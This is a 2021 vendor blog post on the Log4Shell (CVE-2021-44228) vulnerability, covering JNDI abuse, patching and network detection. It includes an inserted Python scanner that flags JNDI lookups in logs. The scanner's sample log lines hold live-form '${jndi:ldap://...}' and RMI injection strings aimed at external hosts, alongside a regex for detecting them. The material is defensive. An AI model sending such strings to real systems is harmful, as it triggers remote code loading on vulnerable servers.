URL: https://www.extrahop.com/company/blog/2021/log4j-security-exploit/
DEFEND AGAINST LOG4J EXPLOITS

 * Jeff Costlow

 * December 10, 2021

A zero-day vulnerability referred to as Log4Shell in the commonly used
Java-based utility Log4j (CVE-2021-44228) has been disclosed. An attacker using
a Log4j exploit can remotely execute code that, once deployed, can grant the
attacker full server control, making the flaw a critical and widespread
cybersecurity threat. Proof-of-concept Log4j exploit examples are currently
available, and attackers are believed to be actively targeting vulnerable
systems.

The flaw lets an attacker abuse the Java Naming and Directory Interface (JNDI)
API so that Log4j executes arbitrary malicious code supplied by the attacker.
Current analysis suggests the lookup is delivered via LDAP or RMI to a remote
server, which then redirects JNDI to reach out to another server over HTTPS or
another protocol. Apache has released an emergency patch. Because Log4j is
ubiquitous in commonly used Java apps such as Jira, iCloud, and Minecraft, many
users have the software deployed and are unaware that it is running in their
environment.

While the total impact on affected applications and devices is not yet known,
further proofs-of-concept indicate that attackers may be able to target physical
devices such as iPhones, in addition to cloud-based services and apps, deepening
the potential risk. Reports quickly surfaced of observed scanning behavior.

REMEDIATION AND DETECTION

Log4j exploits have been discovered that use alternate ports or evasion
encodings, as well as Tor to hide identifying details.

Immediate updates of software containing the Log4j utility are recommended.
However, because of complex supply chain dependencies, vulnerable users depend
on their suppliers to patch systems and release the necessary updates, and many
users do not know which of their applications are vulnerable.
Understanding the baseline behavior of affected applications can help
organizations identify indicators of compromise associated with this flaw, which
is where machine-learning-based detections from a network detection and response
solution can assist.


ADDRESSING LOG4J WITH EXTRAHOP REVEAL(X) 360

Reveal(x) transaction records can be searched for JNDI calls, which can provide
a starting point for investigating potential exploit attempts. If new JNDI calls
are observed to external endpoints, the external IPs should be blocked
immediately. If using JNDI calls is an expected behavior, then further
investigation may be required to identify whether the activity is malicious or
benign.
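The workflow described above (search records for JNDI lookups, treat new lookups toward external endpoints as the addresses to block, and keep an eye on the alternate ports mentioned under Remediation and Detection) can be approximated outside Reveal(x) with a small log scanner. The following is an added example, not ExtraHop's code and not a Reveal(x) feature: it runs over constructed access-log lines, extracts the host and port each JNDI lookup string would connect to, flags nonstandard ports, and separates external targets (block candidates) from internal ones (which need further investigation, as the post says). The log lines, the internal address ranges and the `.corp.example` suffix are assumptions. It matches only the plain `${jndi:` form; the encoded variants the post mentions would have to be normalized by your log pipeline before this check.

```python
import ipaddress
import re
from dataclasses import dataclass
from typing import List, Optional
from urllib.parse import urlsplit

# Constructed sample access-log lines (not from the page). The last field is the
# User-Agent, one of the attacker-controlled values that ends up in Log4j output.
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET /login HTTP/1.1" 200 "${jndi:ldap://198.51.100.23:1234/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET /api HTTP/1.1" 200 "${JNDI:RMI://203.0.113.7:1099/obj}"',
    '10.0.0.12 - - [10/Dec/2021:12:00:04 +0000] "GET /health HTTP/1.1" 200 "${jndi:ldap://10.1.2.3:389/cn=app}"',
]

# A JNDI lookup string; the URI inside the braces is captured. Case-insensitive,
# so ${JNDI:...} is caught as well.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*(?P<uri>[^}]+)\}", re.IGNORECASE)

# Default ports for the schemes JNDI commonly resolves; any other port is flagged.
DEFAULT_PORTS = {"ldap": 389, "ldaps": 636, "rmi": 1099, "dns": 53}

# Assumed internal address space (RFC 1918 plus loopback) and an assumed internal
# DNS suffix. In practice both come from your asset inventory.
INTERNAL_NETWORKS = [
    ipaddress.ip_network(n)
    for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")
]
INTERNAL_SUFFIXES = (".corp.example",)


@dataclass
class Finding:
    source_ip: str          # client that sent the request
    scheme: str             # ldap, rmi, ...
    host: str               # where the JNDI lookup would connect
    port: Optional[int]
    nonstandard_port: bool  # port differs from the scheme's default
    external: bool          # host is outside the internal ranges / suffixes


def is_external(host: str) -> bool:
    """True unless the host is an internal IP or carries an internal DNS suffix."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return not host.lower().endswith(INTERNAL_SUFFIXES)
    return not any(ip in net for net in INTERNAL_NETWORKS)


def scan_line(line: str) -> List[Finding]:
    """Return one Finding per JNDI lookup string found in a log line."""
    source_ip = line.split(" ", 1)[0]
    findings: List[Finding] = []
    for m in JNDI_RE.finditer(line):
        parts = urlsplit(m.group("uri").strip())
        host = parts.hostname
        if not host:
            continue  # malformed URI, nothing would be resolved
        try:
            port = parts.port
        except ValueError:
            port = None
        default = DEFAULT_PORTS.get(parts.scheme)
        findings.append(Finding(
            source_ip=source_ip,
            scheme=parts.scheme,
            host=host,
            port=port,
            nonstandard_port=port is not None and default is not None and port != default,
            external=is_external(host),
        ))
    return findings


def scan_logs(lines: List[str]) -> List[Finding]:
    return [f for line in lines for f in scan_line(line)]


def block_candidates(findings: List[Finding]) -> List[str]:
    """External JNDI targets: the endpoints the post says to block immediately."""
    return sorted({f.host for f in findings if f.external})


if __name__ == "__main__":
    results = scan_logs(SAMPLE_LOGS)
    for f in results:
        flags = (["EXTERNAL"] if f.external else ["INTERNAL"]) + \
                (["NONSTANDARD-PORT"] if f.nonstandard_port else [])
        print(f"{f.source_ip} -> {f.scheme}://{f.host}:{f.port} {' '.join(flags)}")
    print("block candidates:", block_candidates(results))
```

Internal targets are deliberately kept out of the block list: as the post notes, a JNDI lookup toward an internal directory server may be expected behavior, so those findings are for the investigation queue rather than the firewall.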

ExtraHop is releasing a Threat Briefing and a detector for the vulnerability,
which will be deployed automatically for Reveal(x) customers. The ExtraHop
Threat Research Team is closely monitoring for new PoCs, and will provide
updates as more information becomes available.

Due to the widespread nature of this CVE, ExtraHop advises that all
organizations assume the Log4j exploit has been used against them, and continue
to actively monitor their network for signs of compromise.

 * Posted in Cybersecurity, Security Alerts, NDR